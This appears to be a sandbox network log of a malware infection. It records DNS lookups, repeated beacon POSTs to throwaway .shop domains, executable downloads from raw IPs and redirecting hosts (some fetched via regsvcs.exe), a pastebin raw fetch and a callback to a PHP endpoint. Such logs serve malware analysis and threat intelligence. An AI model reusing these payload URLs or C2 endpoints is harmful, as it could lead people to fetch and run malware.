Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5KoQotaLIhDPuC6Q%2FPqNs%2B0Lws2UX%2FhyeYfgDtWLXwBAiInpV84ct6IfvQbdnQqANL3wYLb2pN5gDCXiofd1puYQO%2FC15JE1Bu02q%2BjobbRYQpObb%2BERChonWj9%2Bh0DqKwqPurfblYaliw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f425ec4e3d250e-LHR
alt-svc: h3=":443"; ma=86400

Remote address: 8.8.8.8:53
Request: worryfillvolcawoi.shop IN A
Response:
worryfillvolcawoi.shop IN A 104.21.44.125
worryfillvolcawoi.shop IN A 172.67.199.191

Remote address: 104.21.44.125:443
Request:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: worryfillvolcawoi.shop
Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ih4snnrtbq029ipnmdh88bscen; expires=Thu, 29-Aug-2024 16:12:23 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SctJG0EWr1s0FwToajkzm1HtDT9GDtmw%2FG%2Fs5J8qAVluFUIKxZzCragpfzwhW%2BoJJ6HdSfBawvzxIPr6S1kgyBc1PtTEiDM7ZsinbEpItkZzYYjlTw1mhLJJe3ZKsHBbu3rntIozWXD5"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f425ee9a5652bd-LHR
alt-svc: h3=":443"; ma=86400

Remote address: 8.8.8.8:53
Request: 211.67.21.104.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 80.121.18.2.in-addr.arpa IN PTR
Response:
80.121.18.2.in-addr.arpa IN PTR a2-18-121-80.deploy.static.akamaitechnologies.com

Remote address: 8.8.8.8:53
Request: 132.72.21.104.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: enthusiasimtitleow.shop IN A
Response:
enthusiasimtitleow.shop IN A 172.67.183.226
enthusiasimtitleow.shop IN A 104.21.18.233
Remote address:172.67.183.226:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: enthusiasimtitleow.shop
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=46pndf28s32rhp3meqrrol5n6s; expires=Thu, 29-Aug-2024 16:12:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eI%2Fsh1b3B6TVW255gMa0OA%2BCHLq0CkcHFAu2Jl05BP5OI%2BEOdJUfn4a2NOR18H1vvQSsZfhuviEauh8EORxCBQwd08Kjnbr4KXIhGcqo8WSJsSz%2Bixc7J85lElLB2DfRyFHhpK%2F%2FXcrnRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f425f108797755-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestdismissalcylinderhostw.shopIN AResponsedismissalcylinderhostw.shopIN A104.21.22.160dismissalcylinderhostw.shopIN A172.67.205.132
-
Remote address:104.21.22.160:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: dismissalcylinderhostw.shop
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=fi7jqqjmvgtl10dffdl25rm6b5; expires=Thu, 29-Aug-2024 16:12:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ecV2H5n4PW8mv33gReHv1tbRuwFJp7XsjpfAfwIjYWfc1LkVfu6GkSd0nF0Ndr8Qfjyv%2FKZRUz84cLlohFV%2BoMNnGz8n1ISAwItI5rLrRA2TJV5SAyijWnIiol%2F7XjaOqYWhBILujd3c%2BRMAacw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f425f3ae679523-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Request125.44.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request226.183.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request160.22.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestdiskretainvigorousiw.shopIN AResponsediskretainvigorousiw.shopIN A104.21.23.143diskretainvigorousiw.shopIN A172.67.211.165
-
Remote address:104.21.23.143:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: diskretainvigorousiw.shop
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ut64s1ahhpkic1cdl4buogp96e; expires=Thu, 29-Aug-2024 16:12:25 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4WZRjzikAgOkOqztJnGtW8twjTH2c%2FoZdN8q3zHKhFjfCIw8k%2FD%2FcTQKpiq7oBEKEUqhPNDM%2FNDr2rrXid2X%2BFEFs2JKu8LAsnAM5F7%2Fthe5sgEwdhCPXRlROOuJ7%2FpXtvAoMcWYtkwjwjh%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f425f7592f532a-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 193.233.132.234:80
Request: GET /files/file300un.exe HTTP/1.1
Host: 193.233.132.234
Response: HTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sun, 05 May 2024 08:06:02 GMT
ETag: "66890-617b06c84a0a2"
Accept-Ranges: bytes
Content-Length: 419984
Content-Type: application/x-msdownload
-
Remote address: 8.8.8.8:53
Request: communicationgenerwo.shop IN A
Response: communicationgenerwo.shop IN A 172.67.166.251
          communicationgenerwo.shop IN A 104.21.83.19
-
Remote address: 172.67.166.251:443
Request: POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: communicationgenerwo.shop
Response: HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=bhcjgpt2ai989jcoe3iaa9ti54; expires=Thu, 29-Aug-2024 16:12:25 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKljyrsG5j41Z03hEs3s8%2Ftk4U1%2F3tvlQNxv4ZTqZc%2FBPdnWdjTVgb67mDwuBKcz63mkVW1qeTG8icq24%2FRX2IaQdzGEE12cvtudDp7%2FoBeGMzNq2iPEw9fLldymOREzfku5v3wVuVzOkmkI"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f425fa9b65889e-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 8.8.8.8:53
Request: 67.113.215.185.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 143.23.21.104.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: pillowbrocccolipe.shop IN A
Response: pillowbrocccolipe.shop IN A 104.21.47.56
          pillowbrocccolipe.shop IN A 172.67.144.218
-
Remote address: 104.21.47.56:443
Request: POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: pillowbrocccolipe.shop
Response: HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=p6inpv2htjo92ue9frutaak6ep; expires=Thu, 29-Aug-2024 16:12:26 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7a%2FhgrD%2FkPupMtUysh7cEQWPoUVzmYb2jtiwwKNQzuWNxPMf0aLzMDmPVhv3HO9AkJqhx7J%2BxUfwqBndvWbDunMLi9mxvvlE4kpMM4943JBvkaBqtCiQs96S5cwV6QQLh%2BEKzEi5HsFb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f425fd1e2a9439-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 8.8.8.8:53
Request: 56.47.21.104.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 251.166.67.172.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 234.132.233.193.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: zippyfinickysofwps.shop IN A
Response: zippyfinickysofwps.shop IN A 104.21.39.216
          zippyfinickysofwps.shop IN A 172.67.148.231
-
Remote address: 104.21.39.216:443
Request: POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: zippyfinickysofwps.shop
Response: HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=o1ger3vi1innf0hpgqptf2j451; expires=Thu, 29-Aug-2024 16:12:29 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MV2dbR9ndtsn3jd5h449WYHBZQCXZ12%2FmfHofVxTKn%2FXSqqxL0C84VBE1nvBkrIj%2BNKaYAQh6CRf4oxnKLaOMQBusezqrc%2F%2FPhvXsMX6tq4fXpraJfoUpmauQamC4P3GLRhg3OSHnuzwBg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f426119eaf941b-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 8.8.8.8:53
Request: yip.su IN A
Response: yip.su IN A 104.21.79.77
          yip.su IN A 172.67.169.89
-
Remote address: 8.8.8.8:53
Request: pastebin.com IN A
Response: pastebin.com IN A 104.20.4.235
          pastebin.com IN A 172.67.19.24
          pastebin.com IN A 104.20.3.235
-
Remote address: 104.20.4.235:443
Request: GET /raw/E0rY26ni HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 459
Last-Modified: Sun, 05 May 2024 22:18:11 GMT
Server: cloudflare
CF-RAY: 87f42613adef940d-LHR
-
Remote address: 104.21.79.77:443
Request: GET /RNWPd.exe HTTP/1.1
Host: yip.su
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
memory: 0.36199188232421875
expires: Sun, 05 May 2024 22:25:50 +0000
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
Cache-Control: max-age=14400
CF-Cache-Status: EXPIRED
Last-Modified: Sun, 05 May 2024 22:23:46 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BEVt764WAkLqzK8sYmBWwd1ASPMkr93Y%2B6ZVCNOa9t32PfbuKhP8sKtCDDObxP3AVElQW0uRH%2BRYGsVTBncmlK4GPTy00BDFS%2B1vZaX7AiXo11a8RFN5TzY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f42613ca9223d8-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 8.8.8.8:53
Request: acceptabledcooeprs.shop IN A
Response: acceptabledcooeprs.shop IN A 172.67.180.137
          acceptabledcooeprs.shop IN A 104.21.59.156
-
Remote address: 172.67.180.137:443
Request: POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: acceptabledcooeprs.shop
Response: HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=dfoae07eaar38dk4u48qhfp9g4; expires=Thu, 29-Aug-2024 16:12:29 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iCbCZESpIXx%2BjY2Nn9y6tnhk7FvmZgbJQUcn1kqVp4iPSPlh4P0gElLrAd4Y%2F%2FZ8Bo0GXEOEVyjUGzs8V3z5%2B96dtJ%2FatcQXB0a0YzSaIeiGEQautkAHgu1aKH6Bkb996rBgNROVJ17vfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f42614694776f0-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 8.8.8.8:53
Request: 216.39.21.104.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 235.4.20.104.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 77.79.21.104.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 185.172.128.59:80
Request: GET /ISetup5.exe HTTP/1.1
Host: 185.172.128.59
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sun, 05 May 2024 22:15:01 GMT
ETag: "68201-617bc48bc604f"
Accept-Ranges: bytes
Content-Length: 426497
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
-
Remote address: 8.8.8.8:53
Request: onlycitylink.com IN A
Response: onlycitylink.com IN A 104.21.18.166
          onlycitylink.com IN A 172.67.182.192
-
Remote address: 193.233.132.175:80
Request: GET /server/ww12/AppGate2103v01.exe HTTP/1.1
Host: 193.233.132.175
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:50 GMT
Content-Type: application/octet-stream
Content-Length: 5725464
Last-Modified: Sun, 05 May 2024 10:41:08 GMT
Connection: keep-alive
ETag: "66376244-575d18"
Accept-Ranges: bytes
-
Remote address: 193.233.132.234:80
Request: GET /files/setup.exe HTTP/1.1
Host: 193.233.132.234
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sun, 05 May 2024 06:37:39 GMT
ETag: "63aba2-617af307316c9"
Accept-Ranges: bytes
Content-Length: 6532002
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
-
Remote address: 193.233.132.234:80
Request: GET /files/setup.exe HTTP/1.1
Host: 193.233.132.234
-
Remote address: 193.233.132.234:80
Request: GET /files/loader-2841.exe HTTP/1.1
Host: 193.233.132.234
Connection: Keep-Alive
Response: HTTP/1.1 404 Not Found
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Content-Length: 301
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
Remote address: 8.8.8.8:53
Request: realdeepai.org IN A
Response: realdeepai.org IN A 172.67.193.79
          realdeepai.org IN A 104.21.90.14
-
Remote address: 8.8.8.8:53
Request: nic-it.nl IN A
Response: nic-it.nl IN A 189.232.19.193
          nic-it.nl IN A 189.181.37.206
          nic-it.nl IN A 190.146.112.188
          nic-it.nl IN A 123.212.43.225
          nic-it.nl IN A 187.225.176.41
          nic-it.nl IN A 109.98.58.98
          nic-it.nl IN A 186.112.12.58
          nic-it.nl IN A 217.219.131.81
          nic-it.nl IN A 186.182.55.44
          nic-it.nl IN A 187.134.46.246
-
Remote address: 172.67.193.79:443
Request: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: realdeepai.org
Connection: Keep-Alive
Response: HTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://jonathantwo.com/6998c6a8d4954ef9ee79e698cdc0836d/6779d89b7a368f4f3f340b50a9d18d71.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FDyYNM207wfhLkLJV%2BptqFLKmA%2FptRGGta4ODD%2B1gldd8luuLbToe2Uk1RoTgyeYomIRxaYlYtCJT6LffxOr145RXERAdQP%2FD4Kx7k5AOMIo7%2FGhQmqw7col59ptfYMedA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f426151bfc9520-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 172.67.193.79:443
Request: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: realdeepai.org
Connection: Keep-Alive
Response: HTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://jonathantwo.com/6998c6a8d4954ef9ee79e698cdc0836d/6779d89b7a368f4f3f340b50a9d18d71.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FCO%2F6aK4TtyrJFh0Gu3wdKZWUREi9W8N27Ghgx6hi%2FLUsMNWJQmJk8Ji4ScEmKr7d2dD9WjuVRrJ8mvcT8VNDT71eP1i%2BDI43NNMqETAVoyo6w%2BCIuyp6FU0WtQYbNzMMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f42615191f76f9-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 104.21.18.166:443
Request: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: onlycitylink.com
Connection: Keep-Alive
Response: HTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://firstfirecar.com/6998c6a8d4954ef9ee79e698cdc0836d/baf14778c246e15550645e30ba78ce1c.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sjJFohCszWTJvd9FhnAIs4Okny81C%2Bmb5eaQQzwFfMlfEC%2Br12J73d8i%2FC8gehkUu5VEz2ZZALIC2%2BtZAiOqmXVNNPgCSOHWD6sCM%2BZZ8c91mWU4B2BAbm%2BzVy%2F4EwMPZ3jt"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f426151e296401-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 104.21.18.166:443
Request: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: onlycitylink.com
Connection: Keep-Alive
Response: HTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://firstfirecar.com/6998c6a8d4954ef9ee79e698cdc0836d/baf14778c246e15550645e30ba78ce1c.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m%2BoHjopHmgVYZZcRHanCf9cux8%2BSxu2xKC%2B8zPUa4r5mRFzv0z1Sdog2jjYWkBBQrR2cRrph0Eb28VD5ALpZJSlN0TWOSsDeXd5DUATzcQTx2ngYSOs2qn527kMPSVEeVLvN"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f426151c9571aa-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 8.8.8.8:53
Request: obsceneclassyjuwks.shop IN A
Response: obsceneclassyjuwks.shop IN A 172.67.192.5
          obsceneclassyjuwks.shop IN A 104.21.20.88
-
Remote address: 8.8.8.8:53
Request: jonathantwo.com IN A
Response: jonathantwo.com IN A 104.21.31.124
          jonathantwo.com IN A 172.67.176.131
-
Remote address: 8.8.8.8:53
Request: firstfirecar.com IN A
Response: firstfirecar.com IN A 104.21.60.76
          firstfirecar.com IN A 172.67.193.220
-
Remote address: 172.67.192.5:443
Request: POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: obsceneclassyjuwks.shop
-
GET https://jonathantwo.com/6998c6a8d4954ef9ee79e698cdc0836d/6779d89b7a368f4f3f340b50a9d18d71.exe (process: regsvcs.exe)
Remote address: 104.21.31.124:443
Request: GET /6998c6a8d4954ef9ee79e698cdc0836d/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: jonathantwo.com
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Content-Type: application/x-ms-dos-executable
Content-Length: 4361112
Connection: keep-alive
Last-Modified: Sun, 05 May 2024 21:54:26 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 134
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bqoREgfHrf9T29vfUsKG7O2FGaY%2FpGeuyGSt1V8qTR79HzbuTKprtVwcV93VNOiTmTUu%2BX4G6R8ns08Ij2MBrapUXgBQye9K5UWaXuHu3dMXKP%2BnaLBzLkV3yvUJ6vysQtQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f42616c9d248ce-LHR
alt-svc: h3=":443"; ma=86400
-
GET https://jonathantwo.com/6998c6a8d4954ef9ee79e698cdc0836d/6779d89b7a368f4f3f340b50a9d18d71.exe (process: regsvcs.exe)
Remote address: 104.21.31.124:443
Request: GET /6998c6a8d4954ef9ee79e698cdc0836d/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: jonathantwo.com
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Content-Type: application/x-ms-dos-executable
Content-Length: 4361112
Connection: keep-alive
Last-Modified: Sun, 05 May 2024 21:54:26 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 134
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Plo0PQKzVB2Uexjdo%2B5pHzzY4IxdauKL1huZdCYoil09DUqrx8OokiP1MSybpEUdSTQNQz7H165Pt1eMNIFjxSN%2FOGWWHRYxhfz1WkPt32ECnCbbSQVTXdzGn98s1v%2BzDV8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f42616aae16341-LHR
alt-svc: h3=":443"; ma=86400
-
GET https://firstfirecar.com/6998c6a8d4954ef9ee79e698cdc0836d/baf14778c246e15550645e30ba78ce1c.exe (process: regsvcs.exe)
Remote address: 104.21.60.76:443
Request: GET /6998c6a8d4954ef9ee79e698cdc0836d/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: firstfirecar.com
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Content-Type: application/x-ms-dos-executable
Content-Length: 4361104
Connection: keep-alive
Last-Modified: Sun, 05 May 2024 21:54:54 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 139
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QGUWHG6esKnuipQ56jQW6V4YVWwUXsX43jroNoqKlohrSJJ6bAzAydYjSzRVnOYt8%2Bt9Vzk%2Be6FjEsOQa7tXJ4XPhVFq%2FOqbjwZCVkOdGmt3GvVCXt6PVINT0HU2zRHkD9NB"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f42616c91b4599-LHR
alt-svc: h3=":443"; ma=86400
-
GET https://firstfirecar.com/6998c6a8d4954ef9ee79e698cdc0836d/baf14778c246e15550645e30ba78ce1c.exe (process: regsvcs.exe)
Remote address: 104.21.60.76:443
Request: GET /6998c6a8d4954ef9ee79e698cdc0836d/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: firstfirecar.com
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Content-Type: application/x-ms-dos-executable
Content-Length: 4361104
Connection: keep-alive
Last-Modified: Sun, 05 May 2024 21:54:54 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 122
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4SeNClImOpfj3XNCYSvpyEL4OBWlVy7GPfFUhjyByFlJx9ggPVAnpldY5yJVNK3fOTX%2BjcQ8Ih0defIZSNGhYzBDcNzU3H99YR2ScyPUwM9WC%2Fsag6lvIKu5bxQybm9HWdVL"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f42616cad49565-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 8.8.8.8:53
Request: sweetsquarediaslw.shop IN A
Response: sweetsquarediaslw.shop IN A 172.67.203.170
          sweetsquarediaslw.shop IN A 104.21.44.201
-
Remote address: 185.172.128.19:80
Request: GET /NewB.exe HTTP/1.1
Host: 185.172.128.19
Response: HTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:26:16 GMT
Content-Type: application/octet-stream
Content-Length: 428544
Last-Modified: Thu, 09 Nov 2023 18:10:51 GMT
Connection: keep-alive
ETag: "654d20ab-68a00"
Accept-Ranges: bytes
-
Remote address: 8.8.8.8:53
Request: 67.65.42.5.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 185.172.128.19:80
Request: POST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 4
